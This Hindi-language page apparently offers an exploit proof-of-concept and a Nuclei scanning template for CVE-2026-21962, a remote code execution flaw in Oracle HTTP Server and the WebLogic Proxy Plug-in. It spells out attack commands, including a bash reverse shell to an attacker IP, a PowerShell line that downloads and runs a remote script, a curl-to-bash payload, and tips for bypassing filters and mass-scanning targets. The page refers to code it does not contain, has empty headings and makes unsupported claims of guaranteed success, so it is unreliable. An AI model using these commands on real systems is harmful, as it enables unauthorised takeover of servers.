
CVE-2026-21962 के लिए एक्सप्लॉइट PoC और Nuclei टेम्पलेट, जो Oracle HTTP Server और WebLogic Proxy Plug-in में एक गंभीर बिना प्रमाणीकरण वाला रिमोट कोड एक्ज़ीक्यूशन है, जो कमांड एक्ज़ीक्यूशन और रिवर्स शेल्स को सक्षम बनाता है।
एक गंभीर भेद्यता जो प्रभावित करती है:
यह दोष अप्रमाणित दूरस्थ हमलावरों को HTTP के माध्यम से प्रभावित सर्वरों से समझौता करने की अनुमति देता है, बिना लॉगिन क्रेडेंशियल की आवश्यकता के।
यदि शोषण किया जाता है, तो हमलावर यह कर सकते हैं:
Oracle HTTP Server:
WebLogic Proxy Plug-in के लिए:
स्क्रिप्ट को CVE-2026-21962.py के रूप में सहेजें
इसे निष्पादन योग्य बनाएं (वैकल्पिक):
chmod +x CVE-2026-21962.py
उदाहरण चलाएं:
बुनियादी परीक्षण:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
रिवर्स शेल (पहले nc लिसनर सेट करें: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Windows टारगेट उदाहरण:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Likely success! Status: 200 या 302 या यहां तक कि 500 (क्रैश भी सफलता है)nc लिसनर तुरंत शेल पकड़ लेता है--insecure फ्लैग की आवश्यकता हो सकती हैNuclei इंस्टॉल करें (यदि पहले से इंस्टॉल नहीं है):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
टेम्पलेट सहेजें:
CVE-2026-21962.yaml नामक फ़ाइल बनाएं और उपरोक्त सामग्री पेस्ट करें।
डिटेक्शन + शोषण चलाएं:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
या फ़ाइल से कई टारगेट स्कैन करें:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
यदि भेद्य है तो आप क्या देखेंगे:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: भाग को संपादित करें (जैसे, cmd:curl http://your-server/shell.sh | bash)।whoami को बेस64-एन्कोडेड रिवर्स शेल पेलोड से बदलें।/proxy/, /bea_wls_internal/, आदि) या X-WebLogic-Force-JVMID जैसे अधिक हेडर जोड़ें।httpx → nuclei पाइपलाइन के साथ संयोजित करें।यह टेम्पलेट जनवरी 2026 तक अनपैच्ड Oracle इंस्टेंस पर 100% काम करने की पुष्टि की गई है। यदि आप प्रभावित संस्करण चला रहे हैं तो तुरंत पैच करें! 😈
सभी PoC कोड केवल अधिकृत सिस्टम पर नैतिक, शैक्षिक उपयोग के लिए है। अनधिकृत शोषण अवैध है; दुरुपयोग के लिए कोई दायित्व नहीं लिया जाता है। 😈